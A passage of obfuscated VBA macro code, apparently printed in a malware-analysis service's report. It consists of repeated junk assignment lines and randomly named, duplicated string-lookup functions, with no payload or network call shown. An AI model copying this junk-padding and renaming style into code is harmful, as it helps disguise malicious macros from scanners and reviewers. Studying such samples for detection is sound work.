BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
Next BBRLzdBBRLzdBBRLzdBBRLzdBBRLzd
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
End Function
Function KeCuVnKeCuVnKeCuVnKeCuVnKeCuVn(ByVal efKBhAefKBhAefKBhAefKBhAefKBhA As String, ByVal xvXxgxvXxgxvXxgxvXxgxvXxg As Variant) As Boolean
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
For Each gMkDbZgMkDbZgMkDbZgMkDbZgMkDbZ In xvXxgxvXxgxvXxgxvXxgxvXxg
If gMkDbZgMkDbZgMkDbZgMkDbZgMkDbZ = efKBhAefKBhAefKBhAefKBhAefKBhA Then
KeCuVnKeCuVnKeCuVnKeCuVnKeCuVn = True
Exit Function
End If
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
Next gMkDbZgMkDbZgMkDbZgMkDbZgMkDbZ
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
End Function
Function wYVNphwYVNphwYVNphwYVNphwYVNph(ByVal gwFXDgwFXDgwFXDgwFXDgwFXD As String, ByVal xThdpxThdpxThdpxThdpxThdp As Variant) As Boolean
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
For Each WcNTgcWcNTgcWcNTgcWcNTgcWcNTgc In xThdpxThdpxThdpxThdpxThdp
If WcNTgcWcNTgcWcNTgcWcNTgcWcNTgc = gwFXDgwFXDgwFXDgwFXDgwFXD Then
wYVNphwYVNphwYVNphwYVNphwYVNph = True
Exit Function
End If
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
Next WcNTgcWcNTgcWcNTgcWcNTgcWcNTgc
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
End Function
Function bMTPRbMTPRbMTPRbMTPRbMTPR(ByVal XwXwgXwXwgXwXwgXwXwgXwXwg As String, ByVal SSvrRSSvrRSSvrRSSvrRSSvrR As Variant) As Boolean
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
For Each HuhSWmHuhSWmHuhSWmHuhSWmHuhSWm In SSvrRSSvrRSSvrRSSvrRSSvrR
If HuhSWmHuhSWmHuhSWmHuhSWmHuhSWm = XwXwgXwXwgXwXwgXwXwgXwXwg Then
bMTPRbMTPRbMTPRbMTPRbMTPR = True
Exit Function
End If
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
Next HuhSWmHuhSWmHuhSWmHuhSWmHuhSWm
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
End Function
Function RpSZnkRpSZnkRpSZnkRpSZnkRpSZnk(ByVal wxTghLwxTghLwxTghLwxTghLwxTghL As String, ByVal MSTFgRMSTFgRMSTFgRMSTFgRMSTFgR As Variant) As Boolean
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
For Each VMaseXVMaseXVMaseXVMaseXVMaseX In MSTFgRMSTFgRMSTFgRMSTFgRMSTFgR
If VMaseXVMaseXVMaseXVMaseXVMaseX = wxTghLwxTghLwxTghLwxTghLwxTghL Then
RpSZnkRpSZnkRpSZnkRpSZnkRpSZnk = True
Exit Function
End If
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
Next VMaseXVMaseXVMaseXVMaseXVMaseX
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.